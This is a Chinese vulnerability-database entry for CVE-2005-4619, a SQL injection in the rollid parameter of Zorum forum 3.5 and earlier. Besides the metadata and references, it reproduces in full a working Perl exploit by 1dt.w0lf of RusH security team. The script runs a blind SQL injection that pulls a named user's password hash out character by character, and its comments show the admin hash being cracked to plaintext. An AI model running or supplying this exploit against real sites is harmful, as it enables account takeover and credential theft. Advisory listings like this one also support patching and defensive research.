PHPOutsourcing Zorum RollID SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109773 漏洞类型 SQL注入
发布时间 2006-02-17 更新时间 2008-08-27
CVE编号 CVE-2005-4619 CNNVD-ID CNNVD-200512-979
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1509
https://www.securityfocus.com/bid/16131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-979
|漏洞详情
phpoutsourcingZorumForum3.5及更早版本的index.php中存在SQL注入漏洞,远程攻击者可通过在showhtmllist方法中的rollid参数执行任意SQL命令。
|漏洞EXP
#!/usr/bin/perl

use LWP::UserAgent;

# -------------------------------------------------------------------------------------------
# Zorum forum (http://zorum.phpoutsourcing.com/) version 3.5 sql injection exploit
# by 1dt.w0lf // RusH security team
# *** work on all mysql versions
# -------------------------------------------------------------------------------------------
# Usage: r57zor.pl [path] [rollid] [username] 
# [path]     - path to forum
# [rollid]   - forum number where user create topic
# [username] - username for bruteforce
# -------------------------------------------------------------------------------------------
# screen:
# r57zor.pl http://zorum.phpoutsourcing.com/forum/ 4 admin
#  Please wait...
#  [################]
#
#  USER_NAME: admin
#  USER_PASS: 32b3956b2024e0fc
# -------------------------------------------------------------------------------------------  
# well it's just default sql crypting...
#  mysql_crk.exe 32b3956b2024e0fc
#  Hash: 32b3956b2024e0fc
#  Trying length 3
#  Trying length 4
#  Trying length 5
#  Trying length 6
#  Found pass: habzsi
# jabi-dabi-duuuu ... we are admins now... =)
# -------------------------------------------------------------------------------------------
# greets 2: GHC.ru , gst.void.ru
# -------------------------------------------------------------------------------------------
# 01.03.05


$path     = $ARGV[0];
$rollid   = $ARGV[1];
$username = $ARGV[2];

$s_num = 1;
$|++;

if (@ARGV < 2) { &usage; }
print " Please wait...\r\n";
print " [";

### quotes must die =)
($uusername = $username) =~ s/(.)/sprintf("%d,",ord($1))/eg;
$uusername =~ s/(.*),$/$1/;

while(1)
{
if(&found(47,58)==0) { &found(96,122); } 
$char = $i;
if ($char=="0") 
 { 
 print qq{] 
 
 USER_NAME: $username
 USER_PASS: $allchar
 };
 exit(); 
 }
else 
 { 
 print "#"; 
 $allchar .= chr($char); 
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 $ccheck = $_[0];
 $http_query = $path."index.php?method=showhtmllist&list=topic&rollid=".$rollid." AND u.name=char(".$uusername.") AND ascii(substring(u.password,".$s_num.",1))".$ccheck." /*";
 $mcb_reguest = LWP::UserAgent->new() or die;
 $res = $mcb_reguest->post($http_query); 
 @results = $res->content; 
 
 #print " HTTP QUERY : $http_query \r\n";
 
 foreach $result(@results)
  {
  if ($result =~ /details/) { return 1; }
  }
 return 0;
 }
 

sub usage()
 {
 print q( 
+-------------* Zorum sql injection exploit *--------------+
|                  r57 private stuff !!!                   |
|                   http://rst.void.ru                     |
|---* USAGE *----------------------------------------------|
| r57zor.pl [path] [rollid] [username]                     |
+--------------* view sources for more info *--------------+
 );
 exit();
 }

# milw0rm.com [2006-02-17]
|受影响的产品
PHPOutsourcing Zorum 3.5 PHPOutsourcing Zorum 3.4 PHPOutsourcing Zorum 3.3 PHPOutsourcing Zorum 3.2 PHPOutsourcing Zorum 3.1 PHPOutsourcing Zorum 3.0
|参考资料

来源:BID
名称:16131
链接:http://www.securityfocus.com/bid/16131
来源:OSVDB
名称:21372
链接:http://www.osvdb.org/21372
来源:MISC
链接:http://pridels0.blogspot.com/2005/11/zorum-forum-35-rollid-sql-inj-vuln.html